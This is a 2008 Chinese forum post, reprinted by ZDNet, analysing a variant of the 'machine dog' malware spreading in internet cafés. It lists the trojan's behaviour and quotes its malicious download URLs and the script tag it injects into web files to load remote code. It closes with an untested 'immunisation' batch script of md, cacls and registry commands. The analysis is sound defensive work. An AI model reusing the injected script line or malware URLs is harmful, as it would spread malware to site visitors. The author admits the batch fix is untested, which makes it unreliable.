扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
作者:论坛整理 来源:ZDNet网络安全 2008年3月26日
关键字: conime0.exe conime0.exe进程
哎,这东西无敌了,最近在网吧比较流行.昨晚去朋友网吧,抓了一个上来,看了下,应该是个变种.比较恶心的是,被修改的Userinit文件版本等信息都在,汗!还加入防杀的技术```````
一开始是个被感染的Userinit.exe(23,552 字节)的样本
运行,释放usrinit.exe(少了个'e')于%systemroot%\system32下(11,124 字节)
注意,这个才是正常的,但是被做了处理
加了WinUpack的壳,所以数字签字丢了
不是主角,先54,继续....
然后那个Userinit.exe常驻进程,每隔1.5秒会访问网络124.74.201.19(上海市 电信)
所以可能会出现中标的机子一连接网线就中毒的情况
如果网路顺畅,就下木马,首先下载这个:
h**p://www.868wg.com/1/1/update.exe
基本特征:
1、尝试加载pcibus.sys(这个可能是重点)、usb32k.sys和pcidisk.sys,后面2个其实是PE文件。
2、启动%systemroot%\system32\Svchost.exe空壳进程,并把自己代码注入其中。
这时候被操控的Svchost.exe在进程中就等同于病毒。
这点比较狠毒,因为这个是系统文件,无法对其做权限设置,那么以前免疫机器狗的方法通通无效!!
3、查找硬盘htm/.html/.asp/.jsp/.php文件,插入一段代码:
<script language=javascript src=h**p://www.868wg.com/1/1/qq.js></script>
失效了好像``
4、连接网络,下载:
http://www.868wg.com/1/1/elf_listo.txt
获得木马下载列表,并下载
里面有很多连接失效了,搞不懂
我就看了后面几个(已失效),我记忆中机器狗和ARP病毒都是放在后面的连接...
5、可能会对硬盘中的EXE和COM文件做修改(跳过系统盘),但不是感染
用意还不知道,知道的请告诉我
6、病毒刚执行时,会访问pcibus.sys(应该是这个吧,不记得了)。
并把它的一些文件信息保存在:System32\utility.hiv
如果返回的信息无效,那可能会被判断为pcibus.sys是免疫文件夹或无效文件
这时候它会重新写入,并加载。
7、可能会查找一些窗口,并关闭。
具体是什么还不知道,壳没完全脱干净``
8、尝试访问磁盘底层,可能会因此穿还原(未验证)
我是看到那个病毒文件,有3个PE头,内有一驱动
具体是啥东西还不清楚,但是会对磁盘底层进行操作...
另外该病毒可能会利用MS06-040提权,完全控制该系统。
大概就是这些,因为实机,磁盘访问操作我阻止
至于这个东东能不能穿还原还不能肯定
但是不难看出,机器狗这次升级,可能会使以后的免疫工作更难做
..............
对于个人PC办法有很多,但是网吧就不好弄了...
只能暂时用cacls把pcibus.sys、usb32k.sys、pcidisk.sys暂时免疫下
如果可以的话,把注册表的驱动整个项,设置为只读...禁止加载驱动!
把下面复制到文本改成.bat,应该可以免疫:
md %systemroot%\system32\drivers\pcihdd.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\pcibus.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\pcidisk.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\usb32k.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\System32\Com\comrepl32.exe\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime5.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime4.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime3.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime2.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime1.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime0.exe"\免疫文件夹By孤独更可靠...\
cacls %systemroot%\System32\Com\comrepl32.exe /e /p everyone:n
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\pcibus.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\pcidisk.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\usb32k.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
Options\comrepl32.exe" /v debugger /t reg_sz /d Explorer.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
Options\conime0.exe" /v debugger /t reg_sz /d Explorer.exe /f
谁去测试下,我没测试。。。
免疫包,我上传了,有需要的去下````:
http://www.kingzoo.com/tools/孤独更可靠/病毒免疫.rar
对了,至于那个Userinit文件版本的文件,也不见得有什么了不起
雕虫小技
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。